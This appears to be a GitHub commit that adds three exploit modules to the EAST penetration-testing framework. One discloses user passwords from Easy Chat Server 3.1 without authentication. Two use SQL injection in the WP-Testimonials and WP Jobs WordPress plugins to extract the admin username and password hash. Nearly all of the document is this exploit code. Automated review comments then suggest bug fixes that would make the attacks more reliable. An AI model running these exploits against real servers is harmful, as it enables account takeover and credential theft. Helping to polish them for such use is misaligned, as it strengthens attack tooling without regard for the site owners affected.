Add files via upload
Borsig authored Jun 23, 2017
1 parent 02ca37c commit 92f418b
Showing 3 changed files with 317 additions and 0 deletions.
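--- /dev/null
+++ b/exploits/efa_easy_chat_server_pd.py
@@ -0,0 +1,77 @@
+#! /usr/bin/env python
+# -*- coding: utf_8 -*-
+# The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution
+
+import sys
+import os
+import re
+import urllib2
+
+sys.path.append('./core')
+from Sploit import Sploit
+
+INFO = {}
+INFO['NAME'] = "efa_easy_chat_server_pd"
+INFO['DESCRIPTION'] = "Easy Chat Server 3.1 Password Disclosure"
+INFO['VENDOR'] = "http://echatserver.com"
+INFO['DOWNLOAD_LINK'] = 'http://echatserver.com/ecssetup.exe'
+INFO['LINKS'] = ['https://packetstormsecurity.com/files/142884/Easy-Chat-Server-3.1-Password-Disclosure.html']
+INFO["CVE Name"] = ""
+INFO["NOTES"] = """Registeration page 'register.ghp' allows disclosing ANY user's password. Remote un-authenticated attackers can send HTTP GET requests to obtain ANY Easy Chat Server user password."
+"""
+INFO['CHANGELOG'] = "15 Jun, 2017. Written by Gleg team."
+INFO['PATH'] = 'Exploits/Web/'
+
+# Must be in every module, to be set by framework
+OPTIONS = {}
+OPTIONS["HOST"] = "127.0.0.1", dict(description = 'Target IP')
+OPTIONS["PORT"] = 80, dict(description = 'Target port')
+OPTIONS["USER"] = 'admin', dict(description = 'Username')
+
+
+class exploit(Sploit):
+def __init__(self, host = "", port = 0, logger = None):
+Sploit.__init__(self, logger = logger)
+self.name = INFO['NAME']
+self.port = port
+self.host = host
+self.user = ''
+
+def args(self):
+self.args = Sploit.args(self, OPTIONS)
+self.host = self.args.get('HOST', self.host)
+self.port = int(self.args.get('PORT', self.port))
+self.user = self.args.get('USER', 'admin')
+
+def make_url(self, path = ''):
+return 'http://{}:{}{}'.format(self.host, self.port, path)
+
+def run(self):
+self.args()
+self.log("Attacking {}".format(self.host))
+
+url = self.make_url('/register.ghp?username={}&password='.format(self.user))
+try:
+fd = urllib2.urlopen(url)
+content = fd.read()
+except Exception as e:
+self.log(e)
+self.finish(False)
+
+result = re.findall('<INPUT type="password" name="Password" maxlength="30" value="(.+?)">', content)
+if len(result) > 0:
+self.log('Password: ' + result[0])
+self.finish(True)
+else:
+self.log('User not Found')
+self.finish(False)
+
+if __name__ == '__main__':
+"""
+By now we only have the tool mode for exploit..
+Later we would have standalone mode also.
+"""
+
+print "Running exploit %s .. " % INFO['NAME']
+e = exploit('', 80)
+e.run()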
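Review bot: In `run`, the `except` branch logs and calls `self.finish(False)` but does not leave the method, so unless `Sploit.finish` raises or exits (it is outside the diff), the `re.findall` call below runs with `content` unbound and fails with NameError instead of the intended clean failure; add `return` after `self.finish(False)`, or move the parsing into an `else:` clause of the `try`. The same fall-through is in `run` of efa_wordpress_testimonials_sqli.py and efa_wordpress_wp_jobs_sqli.py, where `self.finish(True)` is additionally followed by an unconditional `self.finish(False)`. The `args` method assigns `self.args = Sploit.args(self, OPTIONS)`, which replaces the bound method with a dict on the instance, so a second `self.args()` call raises TypeError; storing the parsed options under another name such as `self.options` avoids that in all three files. `urllib2.urlopen(url)` is called without a `timeout`, so an unresponsive host blocks the framework indefinitely. The USER option is interpolated raw into the query string on the `make_url` line; a value containing `&`, `#` or `%` changes the request, so it should be percent-encoded before formatting.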
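--- /dev/null
+++ b/exploits/efa_wordpress_testimonials_sqli.py
@@ -0,0 +1,120 @@
+#! /usr/bin/env python
+# -*- coding: utf_8 -*-
+# The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution
+
+import sys
+import re
+import base64
+import urllib
+import urllib2
+import cookielib
+
+sys.path.append("./core")
+from Sploit import Sploit
+
+INFO = {}
+INFO['NAME'] = "efa_wordpress_testimonials_sqli"
+INFO['DESCRIPTION'] = "WP-Testimonials WordPress Plugin v.3.4.1 - Union Based SQL Injection"
+INFO['VENDOR'] = "http://www.sunfrogservices.com/web-programmer/wp-testimonials/"
+INFO['DOWNLOAD_LINK'] = ''
+INFO['LINKS'] = ['https://dtsa.eu/wp-testimonials-wordpress-plugin-v-3-4-1-union-based-sql-injection-sqli/']
+INFO["CVE Name"] = ""
+INFO["NOTES"] = """SQL injection vulnerability in WordPress WP-Testimonials Version 3.4.1 allows to an authenticated user to execute arbitrary SQL commands via the testid parameter."""
+
+INFO['CHANGELOG'] = "14 Jun, 2017. Written by Gleg team."
+INFO['PATH'] = 'Exploits/Web/'
+
+# Must be in every module, to be set by framework
+OPTIONS = {}
+OPTIONS["HOST"] = "127.0.0.1", dict(description = 'Target IP')
+OPTIONS["PORT"] = "80", dict(description = 'Target port')
+OPTIONS["BASEPATH"] = '/wordpress', dict(description = 'Basepath')
+OPTIONS["USERNAME"] = 'admin', dict(description = 'Registered user')
+OPTIONS["PASSWORD"] = 'password', dict(description = 'Password')
+OPTIONS["SSL"] = False, dict(description = 'Use SSL')
+
+class exploit(Sploit):
+def __init__(self, host="", port=0, logger=None):
+Sploit.__init__(self, logger = logger)
+self.name = INFO['NAME']
+self.port = port
+self.host = host
+self.ssl = False
+self.basepath = "/"
+self.username = ''
+self.password = ''
+
+def args(self):
+self.args = Sploit.args(self, OPTIONS)
+self.host = self.args.get('HOST', self.host)
+self.port = int(self.args.get('PORT', self.port))
+self.basepath = self.args.get('BASEPATH', self.basepath)
+self.username = self.args.get('USERNAME', self.username)
+self.password = self.args.get('PASSWORD', self.password)
+self.ssl = self.args.get('SSL', self.ssl)
+
+self.cookiesjar = cookielib.CookieJar()
+opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiesjar))
+urllib2.install_opener(opener)
+
+def make_url(self, path = ''):
+return '{}{}:{}{}{}'.format(self.prot(), self.host, self.port, self.basepath, path)
+
+def prot(self):
+return self.ssl and 'https://' or 'http://'
+
+def auth_wordpress(self, username, password):
+
+url = self.make_url('/wp-login.php')
+data = 'log={}&pwd={}&redirect_to=&testcookie=0&wp-submit=%D0%92%D0%BE%D0%B9%D1%82%D0%B8'.format(username, password)
+
+fd = urllib2.urlopen(url)
+init_cookie = fd.headers['Set-Cookie']
+
+request = urllib2.Request(url, data)
+request.add_header('Cookie', init_cookie)
+fd = urllib2.urlopen(request)
+
+power_cookie = ''
+for k in self.cookiesjar:
+power_cookie += k.name + '=' + k.value + ';'
+return power_cookie
+
+
+def run(self):
+self.args()
+
+cookies = self.auth_wordpress(self.username, self.password)
+url = self.make_url('/wp-admin/admin.php?')
+
+sql = 'page=sfstst_manage&mode=sfststedit&testid=' + urllib.quote('-1 UNION ALL SELECT NULL,CONCAT(char(35,35,35),user_login,char(58),user_pass,char(35,35,35)),NULL,NULL,NULL,NULL,NULL,NULL FROM wp_users where id=1 -- comment')
+
+self.log('Begin extracting admin\'s credentials')
+result = ''
+try:
+request = urllib2.Request(url + sql, headers = {'Cookie': cookies})
+fd = urllib2.urlopen(request)
+result = fd.read()
+result = result.split('###')[1]
+except Exception as e:
+self.log(e)
+self.log("Failed!")
+self.finish(False)
+
+if result:
+self.log('Output format username:hash-password')
+self.log('=' * 60)
+self.log('End with: {}'.format(result))
+self.log('=' * 60)
+self.finish(True)
+
+self.finish(False)
+
+if __name__ == '__main__':
+"""
+By now we only have the tool mode for exploit..
+Later we would have standalone mode also.
+"""
+print "Running exploit %s .. " % INFO['NAME']
+e = exploit("192.168.0.1", 80)
+e.run()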
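Review bot: In `auth_wordpress`, `username` and `password` are spliced into the POST body with `str.format` without percent-encoding, so a password containing `&`, `%` or `+` is sent corrupted and the login silently fails; the already-imported `urllib` can build it: `data = urllib.urlencode([('log', username), ('pwd', password), ('redirect_to', ''), ('testcookie', '0'), ('wp-submit', urllib.unquote('%D0%92%D0%BE%D0%B9%D1%82%D0%B8'))])`. The login response is never inspected, so an authentication failure only surfaces later as the generic "Failed!" after `split('###')[1]` raises IndexError inside the broad `except`; checking that `self.cookiesjar` received a login cookie (WordPress sets `wordpress_logged_in_*`) before returning, and logging when it did not, would make the failure mode clear. `fd.headers['Set-Cookie']` raises KeyError when the first response sets no cookie, and the manually added `Cookie` header is redundant once `HTTPCookieProcessor` is installed in `args`. `re` and `base64` are imported but unused. The identical `auth_wordpress` appears in efa_wordpress_wp_jobs_sqli.py.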
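--- /dev/null
+++ b/exploits/efa_wordpress_wp_jobs_sqli.py
@@ -0,0 +1,120 @@
+#! /usr/bin/env python
+# -*- coding: utf_8 -*-
+# The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution
+
+import sys
+import re
+import base64
+import urllib
+import urllib2
+import cookielib
+
+sys.path.append("./core")
+from Sploit import Sploit
+
+INFO = {}
+INFO['NAME'] = "efa_wordpress_wp_jobs_sqli"
+INFO['DESCRIPTION'] = "WordPress Plugin WP Jobs < 1.5 - SQL Injection"
+INFO['VENDOR'] = "http://www.intensewp.com/"
+INFO['DOWNLOAD_LINK'] = ''
+INFO['LINKS'] = ['https://www.exploit-db.com/exploits/42172/']
+INFO["CVE Name"] = "CVE-2017-9603"
+INFO["NOTES"] = """SQL injection vulnerability in the WP Jobs plugin before 1.5 for WordPress allows authenticated users to execute arbitrary SQL commands via the jobid parameter to wp-admin/edit.php"""
+
+INFO['CHANGELOG'] = "14 Jun, 2017. Written by Gleg team."
+INFO['PATH'] = 'Exploits/Web/'
+
+# Must be in every module, to be set by framework
+OPTIONS = {}
+OPTIONS["HOST"] = "127.0.0.1", dict(description = 'Target IP')
+OPTIONS["PORT"] = "80", dict(description = 'Target port')
+OPTIONS["BASEPATH"] = '/wordpress', dict(description = 'Basepath')
+OPTIONS["USERNAME"] = 'admin', dict(description = 'Registered user')
+OPTIONS["PASSWORD"] = 'password', dict(description = 'Password')
+OPTIONS["SSL"] = False, dict(description = 'Use SSL')
+
+class exploit(Sploit):
+def __init__(self, host="", port=0, logger=None):
+Sploit.__init__(self, logger = logger)
+self.name = INFO['NAME']
+self.port = port
+self.host = host
+self.ssl = False
+self.basepath = "/"
+self.username = ''
+self.password = ''
+
+def args(self):
+self.args = Sploit.args(self, OPTIONS)
+self.host = self.args.get('HOST', self.host)
+self.port = int(self.args.get('PORT', self.port))
+self.basepath = self.args.get('BASEPATH', self.basepath)
+self.username = self.args.get('USERNAME', self.username)
+self.password = self.args.get('PASSWORD', self.password)
+self.ssl = self.args.get('SSL', self.ssl)
+
+self.cookiesjar = cookielib.CookieJar()
+opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiesjar))
+urllib2.install_opener(opener)
+
+def make_url(self, path = ''):
+return '{}{}:{}{}{}'.format(self.prot(), self.host, self.port, self.basepath, path)
+
+def prot(self):
+return self.ssl and 'https://' or 'http://'
+
+def auth_wordpress(self, username, password):
+
+url = self.make_url('/wp-login.php')
+data = 'log={}&pwd={}&redirect_to=&testcookie=0&wp-submit=%D0%92%D0%BE%D0%B9%D1%82%D0%B8'.format(username, password)
+
+fd = urllib2.urlopen(url)
+init_cookie = fd.headers['Set-Cookie']
+
+request = urllib2.Request(url, data)
+request.add_header('Cookie', init_cookie)
+fd = urllib2.urlopen(request)
+
+power_cookie = ''
+for k in self.cookiesjar:
+power_cookie += k.name + '=' + k.value + ';'
+return power_cookie
+
+
+def run(self):
+self.args()
+
+cookies = self.auth_wordpress(self.username, self.password)
+url = self.make_url('/wp-admin/edit.php?')
+
+sql = 'post_type=job&page=WPJobsJobApps&jobid=' + urllib.quote('5 UNION ALL SELECT NULL,NULL,NULL,CONCAT(char(35,35,35),user_login,char(58),user_pass,char(35,35,35)),NULL,NULL FROM wp_users where id=1 -- comment')
+
+self.log('Begin extracting admin\'s credentials')
+result = ''
+try:
+request = urllib2.Request(url + sql, headers = {'Cookie': cookies})
+fd = urllib2.urlopen(request)
+result = fd.read()
+result = result.split('###')[1]
+except Exception as e:
+self.log(e)
+self.log("Failed!")
+self.finish(False)
+
+if result:
+self.log('Output format username:hash-password')
+self.log('=' * 60)
+self.log('End with: {}'.format(result))
+self.log('=' * 60)
+self.finish(True)
+
+self.finish(False)
+
+if __name__ == '__main__':
+"""
+By now we only have the tool mode for exploit..
+Later we would have standalone mode also.
+"""
+print "Running exploit %s .. " % INFO['NAME']
+e = exploit("192.168.0.1", 80)
+e.run()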
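Review bot: `self.ssl = self.args.get('SSL', self.ssl)` in `args` stores the option value untouched and `prot()` tests it for truthiness, so if the framework hands option values over as strings (the `int()` applied to PORT on the line above suggests it may; `Sploit.args` is outside the diff, so this is inferred) the string `'False'` is truthy and every URL is built with `https://`; normalising it with `self.ssl = str(self.args.get('SSL', self.ssl)).lower() in ('1', 'true', 'yes')` keeps the option meaningful for both bool and string inputs. The same `args`/`prot` pair is in efa_wordpress_testimonials_sqli.py. `prot()` would also read more plainly as `return 'https://' if self.ssl else 'http://'` instead of the `and`/`or` idiom. `re` and `base64` are imported but never used in this file.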

0 comments on commit 92f418b

Please sign in to comment.